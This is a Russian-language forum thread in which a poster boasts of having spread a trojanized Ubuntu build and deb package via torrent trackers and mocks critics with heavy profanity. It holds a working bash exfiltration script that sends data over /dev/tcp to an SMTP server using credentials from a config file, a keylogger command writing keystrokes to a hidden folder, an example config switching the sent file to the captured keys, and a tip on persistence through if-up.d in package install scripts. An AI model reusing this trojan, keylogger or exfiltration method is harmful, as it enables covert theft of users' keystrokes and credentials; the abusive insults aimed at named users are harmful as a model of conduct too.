Объявление

Kwork.ru - услуги фрилансеров от 500 руб.

#76 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:53:53

SemyonKozakov пишет:

Раз трояна нет, то всей команде трояноклепателей объявляется коллективный отсос.

Чой та нет?  smile Всё есть!  wink Ты не переживай так wink Кстате, в дрист втыкать больше не хочу. Ебли уж больно много. А вот с дебпакетиком как два пальца ап асфальт  big_smile Технология уже отработана и оттестирована, всё пашет  smile

#77 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:47:56

SemyonKozakov пишет:

И ни один адекватный пользователь не скачает.

Качают жэ  lol  lol  lol Я, мне....Да похуй им твоё мнение, хы-хы!

#78 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:45:42

usual_user пишет:

Вы скажете про винду в такой же ситуации? Как с безопасностью у винды в таком случае?

Дык я и неоднократно говорил, что никакой супер-пупер-мегазащищённости в этом случае ни в винде, ни в поделии нет. В винде, правда ситуция получшее будет, потому как очень многие пользуют антивирь. А в поделии это видите ли дурной тон. Да`сссс  cool
В общем тут про это много говорили, не буду повторяться.

#79 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:40:30

usual_user пишет:

Это конечно можно считать трояном, но это совсем не то.

Ещё раз повторю, что был и деб пакет, но успех не столь был впечатляющ. Маловато для выборки Надо чо нить типа какого нибудь проприентарного заебенеть, но ничего свеженького не было  wink

#80 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:36:13

SemyonKozakov пишет:

Я неоднократно заявлял в теме, что качать программы или дистрибутивы Linux не с официального сайта способны только клинические долбоёбы, которые считают линукс панацеей от всех болезней.

Но ведь качают жэ  wink Между прочим вам это талдычили постоянно, только слышались смихуёчки да пиздихаханьки  big_smile

#81 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:34:36

SemyonKozakov пишет:

selenscy, ты эта... соси, не отвлекайся

Соснули пенгванутые, ты не переживай  smile Мне то похуй  cool

#82 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:32:59

SemyonKozakov пишет:

UPS, сборка убунты. На рутрекере. Это финиш. Блестящее окончание столь укуренной темы. Даже, если это правда, это нужно видеть.

Ну деб пакет то тоже был. На другом, правда, трекере  wink Но это немного другая история, не столь впечатляющая  smile

#83 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 23:29:35

UPS пишет:

По каким причинам автор в данном случае Selensy не собрал должных доказательств я не знаю, но то что было именно так видел и я и Tritus.

Ну тест прошёл успешно  smile А большего то и не нужно было  wink Я троянами зарабатывать и не собраюсь и не собирался  smile

Чисто любопытство и может быть джаст фо фан, ну и конечно списиалиста Мудака поучить надо было  smile Что можно сказать....Аполлоша оказался ещё более Мудаком, даже не с маленькой, а с большой буквы. Иной школьник более продвинут, чем это чмо, способное только выдавать многострочную хуету вялотекущей шизофрении.

#84 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 11:45:17

wr224 пишет:

И в чем тогда претензии? Где кракозябры?

Ну надо же Мудаку оправдаться в собственной тупости  smile

Добавлено спустя 04 мин 06 с:

Павел пишет:

Посмотрим, осилили вы эти две строки, или опять вас учить.

Ты хоть майлсендер то освоил?  smile Или до сих пор собираешь почтовый сервер, чтобы почту из консоли оправить пару строчек? lol  lol  lol Мдя, хуле с кластером ф чулане то и не собрать, чтобы потом пяткой в грудь себе стучать, что "одмин" поделия  smile

Добавлено спустя 21 мин 06 с:

pavel2403 пишет:

Ну это же очевидно, он помещает себя в autorun из deb-пакета

Ну я тупо вызов положил в if-up.d  wink На самом деле мест много, только развлекайся!  smile Как уже было сказано, при инсталляции деб пакета можно хоть чёрта лысого положить совершенно не беспокоясь про права, ну желательно конечно замаскировать какими то вызовами wink

#85 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 11:43:55

Apollo 11 пишет:

"Тот скрипт, который выложен по ссылке, не работает".

"Учёный" Мудак!  wink У мну он работает  smile И даже школьник, в отличие от тебя, Мудака, поймёт, что /папка где шкеримся/ это /usr/lib/engine/. Там вот, в этой сцыли, правда конкретный косячок есть, специально для такого Мудака, как ты  smile

echo $file1

Но тебе "учёному" Мудаку на это похуй  lol  lol  lol С самого начала  cool

Вот так вот таких илитных икспердов и выводят в "люди"  wink Ходить уже неделю кругами и бревна не замечать, собирая хуйню про права, архивы, торренты, логгеры. Это пиздец, какой списиалист клоун Аполлоша Троций  lol  lol  lol

Стыдуха!!!

#86 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 11:28:23

Tritus пишет:

Слушай, полудурок, думай что хочешь, но я, в отличие от тебя, долбоёба, видел этот торрент. Поэтому сижу, почитываю твои пространные дебильные рассуждения и заявляю, что ты - недалёкий теоретик, причём ещё и упрямый. И если, хамло, ты что-то хочешь обо мне сказать, то говори это, прямо обращаясь ко мне. На этом всё.

Да какой на х*й учёный! Он в тэухе у жертвы локалхоста учится на Мудака!

Три дня, блять, по кругу ищет несуществующие пути  lol  lol  lol

#87 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 17-10-12 11:26:27

Павел пишет:

И можно проделать очко любого размера, установить любой демон, создать любого юзера с любыми правами и любым паролем...

Да можно и всю систему нахуй замочить  lol Чош нельзя то?  wink Поздравляю, ты сам расписался в беспомощности супер-пупер-мега-защищёного поделия  cool Которое запросто кинет кони от пары строчек  big_smile  big_smile  big_smile

Клап! Клап!

#88 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 14:34:30

Okkamas Buddy пишет:

И, это, я когда на убунту жаловался, мне недвусмысленно намекнули, что убунту - это не линукс...

Конечно нет!  lol  lol  lol И ведроид не линупс!  cool Ну вы поняли  wink

#89 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 14:08:25

usual_user пишет:

Сколько же твой деб весит?

Ну смотря, что протроянить надо, а что?  smile

usual_user пишет:

И какой прогой мыло шлешь?

#!/bin/bash

e_from=`cat /usr/lib/engine/conf | awk '{if (NR==1) {print $1}}'`
  e_to=`cat /usr/lib/engine/conf | awk '{if (NR==2) {print $1}}'`
  header=`cat /usr/lib/engine/conf | awk '{if (NR==3) {print $1}}'`
  body=`cat /usr/lib/engine/conf | awk '{if (NR==4) {print $1}}'`
  e_server=`cat /usr/lib/engine/conf | awk '{if (NR==5) {print $1}}'`
  e_login=`cat /usr/lib/engine/conf | awk '{if (NR==6) {print $1}}'`
  e_pass=`cat /usr/lib/engine/conf | awk '{if (NR==7) {print $1}}'`
  subject=`cat /usr/lib/engine/conf | awk '{if (NR==8) {print $1}}'`
  e_port=`cat /usr/lib/engine/conf | awk '{if (NR==9) {print $1}}'`

exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
 read -r temp <&9
  echo "auth login" >&9
 read -r temp <&9
echo $e_login >&9
 read -r temp <&9
  echo $e_pass >&9
 read -r temp <&9
echo "Mail From: $e_from" >&9
 read -r temp <&9
echo "Rcpt To: $e_to" >&9
 read -r temp <&9
echo "Data" >&9
 read -r temp <&9
  cat $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
cat $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
exit 0

Выше всё описано и разжевано  smile И да! всяких монстроидальных тупорылых транспортов smtp, времён царя гороха, которые ставят себе идиоты с сервисами 24\7, илитные иксперды и прочая школота в этом случае нинада  smile Достаточно и примитивного скрипта  cool  Я таки надеюсь, что ты не будешь, как илитный Мудак, искать папку /usr/lib/engine  lol

usual_user пишет:

А опенссш с нужным конфигом не осилил добавить? big_smile

А ты думаешь зачем проверяется запущен sshd или нет?  wink

#90 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 11:59:57

pavel2403 пишет:

В принципе этот сабж показательный, в плане свидетельства о никчемности луноходов как IT специалистов, о чем собсивенно здесь всегда и говорилось. "Хватание верхушек" без понимания сути процессов, заучивание умных слов и применение их к месту и не к месту вот это их фирменный стиль, поэтому над ними всегда смеялись и буду смеяться принимая за дурачков.

smile

Ещё какой показательный! Столько лулзов от горе списиалистов  cool

Всех конечно же превзошёл Мудак, с большой буквы, илитный списиалист Аполлоша Троцкий  smile Это просто пиздец!

#91 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 01:30:27

Linups_Troolvalds пишет:

а вы фантазируете, что делаете это

Почему фантазии? Это реальный опыт. Естественно в тестовых целях, что бы в реале убедиться, что поделиё ничем не лучше в плане безопасности windows. И приёмы прокатывают абсолютно такие же  smile И даже примитивный шкрипт ставит раком таких вот илитных Мудаков Аполлош Троцких и остальных недалёких вместе с их поделиями.

Добавлено спустя 01 мин 37 с:

Linups_Troolvalds пишет:

Хватит уже, я сказал.

А не пошли бы вы сами знаете куда  wink Сказальщик, ёпть.

#92 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 00:41:39

Apollo 11 пишет:

А я спать пошёл.

Позубри перед сном главу "Как правильно пользоваться bash", илитным Мудакам очень полезно, ибо тупы как пробки  smile

Добавлено спустя 19 мин 20 с:

Linups_Troolvalds пишет:

Может быть, всё же, хватит? Совершать ошибки не так плохо, как отказываться признавать их.

Вы это своему Мудаку, с большой буквы скажите  smile Этот Мудак до сих пор пытается!!!!!!!!!!!  cool  запустить логгер с опцией ведения лога в несуществующей директории у этого Мудака  cool на что поделиё честно говорит, что данной папки нет. Ну Мудак он, с большой буквы, хуле! У мну то эта папка есть  wink Ничто не мешает вести лог под погонялой keys в любом месте  big_smile Например так:

~$ sudo /usr/lib/engine/logk -s -o /var/log/keys --no-func-keys
~$ 

Надеюсь, что у илитных Мудаков-списиалистов-пенгванутых папка хотя бы /var/log таки существует  lol  lol  lol

Хоспадя, каких Мудаков только нету...... cool

#93 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 00:31:02

Apollo 11 пишет:

Да ты чо говоришь?

Вот сиди и чешЫ свою унылую репу илитного Мудака  lol

#94 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 16-10-12 00:15:34

Павел пишет:

Не понимаю, зачем городить всю эту тонкую эстетику с чтением всего из .conf, если вот это

Читаем один conf

почтовый ящик, от имени которого отправляют письма@mail.ru
почтовый ящик кому шлём@mail.ru
/место где храним скрипт/header
/место где храним скрипт/spam
smtp.mail.ru
dTg4MDc=
b20zN2twMVp6SA==
Subject
25
false
0

end configuration

А через какое то время засылаем на заветный сайтик, откуда скрипт скачивает conf немного другое

почтовый ящик, от имени которого отправляют письма@yandex.ru
почтовый ящик кому шлём@yandex.ru
/место где храним скрипт/header
/место где храним скрипт/keys
smtp.yandex.ru
dTg4MDc=
b20zN2twMVp6SA==
Subject
25
false
0

end configuration

Дошло до обладателя сервисов 24\7 ?  smile Или как до илитного Мудака, как до истинного списалиста через неделю в темечке что то щёлкнет  wink

Добавлено спустя 09 мин 01 с:

Apollo 11 пишет:

и выхлоп давай в студию.

[....пожимая плечами...]

А чо не так то?  smile

~$ sudo /usr/lib/engine/logk -s -o /usr/lib/engine/keys --no-func-keys
[sudo] password for afftar: 
~$

#95 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 23:56:33

wr224 пишет:

Вот например тут:

Совершенно верно!  wink А вот от этого пёрла Мудака-списиалиста я ваще выпал в осадок  lol

Apollo 11 пишет:

Если попытаться запустить logkeys с этими параметрами, то logkeys выдаст ошибку.

Это же надо таким Мудаком быть!!! До илитного школьного иксперда, наверное теперь уже неделю, тюкнет в мозжечок НЕОЖИДАННО  lol , что сей скрипт можно вызвать из любого места и из любого другого скрипта  wink  просто так, указав путь : /место где храним скрипт/engine  big_smile 

Будем ждать следующих лулзов от Мудака, с большой буквы, Аполлоши Троцкого, коих он уже доставил немало  big_smile

[....садится в шезлонг и достаёт попкорн.....]

Добавлено спустя 08 мин 48 с:

Apollo 11 пишет:

поскольку тоже не понял необходимости шифроваться. Если кому-то понадобится его вычислить, он просто отследит, куда троян отправляет инфу и откуда скачивает свои "модули".

Эх и идиот!!! Ё-маё  lol  lol  lol

Ну отследи, илитный Мудак, на народе ру  lol  lol  lol

#96 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 17:57:05

Apollo 11 пишет:

Чо ты теперь выкручиваешься, клоун?

Хы-хы! Да клоун только ты здесь  smile Это же надо таким мудаком искать в /usr/lib/engine аж ТРИ!!! дня  lol  lol  lol  Хотя всё предельно было разжёвано алгоритмически. Я уж молчу, что скрипт для тебя МУдака, на несколько частей разбил  lol

Списиалист, блять, по лулзам  smile

#97 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 17:51:08

wr224 пишет:

Я тебе говорю, что bash - это язык, а ты по сути претензии предъявлял по командам, те утилитам, при этом называя их "башем", ты че такой глупый. Все конструкции языка у selenscy были написаны верно, так что отдохни иксперд илитный  wink

Да не обращай внимания на списиалиста  wink Ну убогий он , путает х*й с уксусом. С командами ещё фигня! У этого Мудака только на третий день в мозжечке щёлкнуло, что путь другой , хотя весь скрипт рабочий  lol Ну хуле, как обезьяна повторял, что ему дали, не обращая внимания ни на что более  cool Иксперд илитный, хы-хы!!! Пацан, блять, с рогаткой  big_smile

#98 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 16:50:22

Apollo 11 пишет:

Я говорю о том, что если человек сам не знает bash'а, то как он может утверждать, что скрипт нерабочий?

cool

Клап! Клап!

#99 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 02:13:41

pavel2403 пишет:

Как то вспомнилось былое:

Да ушшшш. Простейшие вещи ставят в тупик илитных "списиалистов", которые как обезьяны сидят за решёткой анально огороженых лепрозориев, вроде бы курят травку маны, а видят х*й  smile Несмотря на наличие божественного поделия  cool

#100 Re: Дорога, открытая всем » Обнаружен первый в истории троянец для Linux. » 15-10-12 01:03:43

Apollo 11 пишет:

Пока Apollo 11 тебе все ошибки в скрипте не исправил,

Это когда ты, списиалист хуев, пути освоил в баше?  wink

На третий день  lol  lol  lol  lol  lol

А до этого, как истинный Мудак, с большой буквы, всё пытался понять, что же находится по пути /usr/lib/engine  cool Блять! Три дня!!!

[....крутит пальцем у виска....]

Надо же таким Мудаком быть! Какой ты на х*й списиалист, иди уж в школе доучивайся!  smile Ни ума, ни фантазии, ни даже проблеска логики. Одни понты Мудака, с большой буквы.

Kwork.ru - услуги фрилансеров от 500 руб.
Мой VPS с 2016 года !
✅ Виртуальные от 300 ₽/месяц, RAM 1-10GB, DISK 20-360 GB;
✅ Выделенные от 3000 ₽/месяц. RAM 4-64GB, DISK до 4TB;
✅ Intel Xeon, SSD, XEN, iLO/KVM, Windows/Linux, Администрирование;
✅ Бесплатно Full Backup и Anti-DDoS.

Подвал форума

Под управлением FluxBB
Модифицировал Visman

Яндекс.Метрика